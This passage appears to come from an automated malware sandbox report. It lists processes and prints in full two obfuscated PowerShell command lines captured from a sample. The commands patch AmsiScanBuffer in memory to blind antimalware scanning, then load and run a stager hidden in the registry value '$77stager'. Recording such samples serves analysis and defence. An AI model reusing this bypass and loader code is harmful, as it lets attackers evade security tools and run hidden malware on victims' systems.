$_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XJxqzvzRvDODYA=$smGxynFlHuhkC.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$izAjtDpTcIykCFLvLFo=nJPykIqMjSVN @([String])([IntPtr]);$zcszEmVRTVnMKlgIWZVgpJ=nJPykIqMjSVN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$clZdOUKBIWi=$smGxynFlHuhkC.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EVLGDNMGdOdUkU=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$clZdOUKBIWi,[Object]('Load'+'LibraryA')));$tUgonAQzgoaRjxFau=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$clZdOUKBIWi,[Object]('Vir'+'tual'+'Pro'+'tect')));$zXIxall=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EVLGDNMGdOdUkU,$izAjtDpTcIykCFLvLFo).Invoke('a'+'m'+'si.dll');$LqcfvWYDFBJgJSDUM=$XJxqzvzRvDODYA.Invoke($Null,@([Object]$zXIxall,[Object]('Ams'+'iSc'+'an'+'Buffer')));$LKXnSGWcBi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tUgonAQzgoaRjxFau,$zcszEmVRTVnMKlgIWZVgpJ).Invoke($LqcfvWYDFBJgJSDUM,[uint32]8,4,[ref]$LKXnSGWcBi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$LqcfvWYDFBJgJSDUM,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tUgonAQzgoaRjxFau,$zcszEmVRTVnMKlgIWZVgpJ).Invoke($LqcfvWYDFBJgJSDUM,[uint32]8,0x20,[ref]$LKXnSGWcBi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 2684)
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OrcKlnKOHJta{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZkBOuMBKjzmISm,[Parameter(Position=1)][Type]$TTLjIuaxNc)$LORruiFvXUU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LORruiFvXUU.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$ZkBOuMBKjzmISm).SetImplementationFlags('Runtime,Managed');$LORruiFvXUU.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$TTLjIuaxNc,$ZkBOuMBKjzmISm).SetImplementationFlags('Runtime,Managed');Write-Output $LORruiFvXUU.CreateType();}$HElwIrNbCPEps=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$NbBYFnZdLBdXUD=$HElwIrNbCPEps.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ObqsWLLoqAsNCkClHIu=OrcKlnKOHJta @([String])([IntPtr]);$JcstHrgkOadiYQpahjCtzI=OrcKlnKOHJta @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$amKDEwymedi=$HElwIrNbCPEps.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$wmFTlrkFCkPUwp=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$amKDEwymedi,[Object]('Load'+'LibraryA')));$XLzSFTPCeGfSoakCk=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$amKDEwymedi,[Object]('Vir'+'tual'+'Pro'+'tect')));$uhtiJOu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wmFTlrkFCkPUwp,$ObqsWLLoqAsNCkClHIu).Invoke('a'+'m'+'si.dll');$RdSeVohReyYAbPLiY=$NbBYFnZdLBdXUD.Invoke($Null,@([Object]$uhtiJOu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$BAnzZuInjX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XLzSFTPCeGfSoakCk,$JcstHrgkOadiYQpahjCtzI).Invoke($RdSeVohReyYAbPLiY,[uint32]8,4,[ref]$BAnzZuInjX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RdSeVohReyYAbPLiY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XLzSFTPCeGfSoakCk,$JcstHrgkOadiYQpahjCtzI).Invoke($RdSeVohReyYAbPLiY,[uint32]8,0x20,[ref]$BAnzZuInjX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\sihost.exe (PID 1852)
  Command line: sihost.exe
C:\Windows\system32\sihost.exe (PID 4548)
  Command line: sihost.exe
C:\Windows\system32\sihost.exe (PID 2464)
  Command line: sihost.exe
C:\Windows\system32\sihost.exe (PID 4988)
  Command line: sihost.exe
Network
MITRE ATT&CK Enterprise v15
Downloads